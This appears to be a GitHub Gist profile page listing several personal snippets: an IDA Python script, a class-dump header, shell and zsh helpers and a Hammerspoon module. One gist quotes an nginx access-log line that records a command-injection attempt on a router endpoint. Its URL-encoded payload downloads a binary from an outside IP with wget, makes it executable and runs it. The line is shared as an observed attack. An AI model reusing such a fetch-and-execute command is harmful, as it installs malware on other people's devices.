Skip to content

Instantly share code, notes, and snippets.

View zcutlip's full-sized avatar

Zachary Cutlip zcutlip

View GitHub Profile
@zcutlip
zcutlip / ida_hello.py
Created July 15, 2021 20:58
IDA python script that prints to console in batch mode
import idc
import os
# you won't see this on the console
print("hello")
class Log:
def __init__(self, logfile):
self.logfile = logfile
@zcutlip
zcutlip / CommerceKit.h
Created December 9, 2021 00:35
Working progress on CommerceKit class dumping
/*
./classdump.py ../build/Release/formatType ./CommerceKit.json
*/
@interface CKDialogController : CKServiceInterface
{
}
@zcutlip
zcutlip / shell_history_backup.zsh
Last active November 10, 2023 21:36
Shell history backup function
# shellcheck shell=bash
# shellcheck disable=SC1091
# source from .zshrc or similar:
# source "$DOTFILES/shell_history_backup.zsh" && _backup_shell_hist
function _backup_shell_hist(){
if [ -n "$SHELL_HIST_BACKUP_LOC" ]
then
_histfile_base="$(basename "$HISTFILE")"
@zcutlip
zcutlip / kill_ss.lua
Created May 24, 2024 23:12
Hammerspoon module to kill `legacyScreensaver`
screenSleep = false
screenSaver = false
screenLock = false
--[[
place in ~/.hammerspoon/kill_screensaver/
load from your hammerspoon init.lua:
require "kill_screensaver.kill_ss"
A to kill legacyScreenSaver when the screen saver exits and/or screen wakes
legacyScreenSaver has a memory leak that causes it to consume many gigabytes of memory over
@zcutlip
zcutlip / access.log
Last active July 25, 2024 03:59
Command injection attempt found in nginx access log
84.54.51.37 - - [24/Jul/2024:12:57:14 -0700] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F74.50.81.158%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 162 "-" "Go-http-client/1.1"
@zcutlip
zcutlip / zsh_completion.zsh
Created December 15, 2024 04:07
ZSH: check for vscode before running 1Password `op completion`
# 'op' completion for some reason causes VSCode to trigger a
# "would like to access data from other apps" prompt
# this happens when vscode or an extension sources your .zshrc
# we need to check for VSCODE_RESOLVING_ENVIRONMENT, since vscode and
# some extensions set that
# We ALSO need to check TERM_PROGRAM since opening an interactive terminal session
# within vscode will *also* trigger the TCC prompt
if [ -z "$VSCODE_RESOLVING_ENVIRONMENT" ] && [ "$TERM_PROGRAM" != "vscode" ];
then
# initialize 1Password cli completions if 'op' exists